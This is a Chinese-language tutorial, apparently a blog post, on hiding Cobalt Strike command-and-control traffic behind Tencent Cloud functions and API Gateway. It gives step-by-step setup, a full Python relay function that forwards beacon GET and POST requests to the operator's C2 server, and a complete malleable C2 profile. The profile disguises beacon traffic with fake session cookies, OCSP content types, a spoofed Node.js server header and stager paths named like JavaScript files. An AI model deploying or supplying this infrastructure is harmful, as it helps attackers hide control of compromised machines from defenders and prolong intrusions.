使用腾讯云函数上线Cobalt Strike

题记

最近买了个腾讯云使，（真香），腾讯云便宜又好用。既然买了腾讯云，当然要试试云函数上线。

环境配置

注册腾讯云账号（API网关第一年免费）

vps一台

cs（我用的4.2）

云函数配置

1、进行云函数控制台

登录腾讯云搜索云函数，点击管理控制台进行配置，第一次配置需要授权。

2、新建函数服务

3、函数名称随意，选择从头开始，环境填Python3.6，选完后下拉，把代码搞里头。

4、打码的地方填vps的地址，这里我配的https，cs上线的时候用443端口上线，http同理80，（代码在下面），填完点完成，后会弹出一个提示框点击留在此页面。

云函数的python代码：

# -*- coding: utf8 -*-

import json,requests,base64

def main_handler(event, context):

C2='http://<C2服务器地址>' # 这里可以使用 HTTP、HTTPS~下角标~

path=event['path']

headers=event['headers']

print(event)

if event['httpMethod'] == 'GET' :

resp=requests.get(C2+path,headers=headers,verify=False)

else:

resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)

print(resp.headers)

print(resp.content)

 

response={

"isBase64Encoded": True,

"statusCode": resp.status_code,

"headers": dict(resp.headers),

"body": str(base64.b64encode(resp.content))[2:-1]

}

return response

5、点击触发管理，创建触发器

6、配置如下，点击提交

7、点击api服务名

8、点击编辑后到达此页面，路径修改为/ ，点击下一步

9、配置如下点击完成后点击发布服务

10、配置cs的profile文件，命名为win_tecent_cloud_func.profile。

set sample_name "t";

set sleeptime "3000";

set jitter "0";

set maxdns "255";

set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

 

http-get {

 

set uri "/api/x";

 

client {

header "Accept" "*/*";

metadata {

base64;

prepend "SESSIONID=";

header "Cookie";

}

}

 

server {

header "Content-Type" "application/ocsp-response";

header "content-transfer-encoding" "binary";

header "Server" "Nodejs";

output {

base64;

print;

}

}

}

http-stager {

set uri_x86 "/vue.min.js";

set uri_x64 "/bootstrap-2.min.js";

}

http-post {

set uri "/api/y";

client {

header "Accept" "*/*";

id {

base64;

prepend "JSESSION=";

header "Cookie";

}

output {

base64;

print;

}

}

 

server {

header "Content-Type" "application/ocsp-response";

header "content-transfer-encoding" "binary";

header "Connection" "keep-alive";

output {

base64;

print;

}

}

}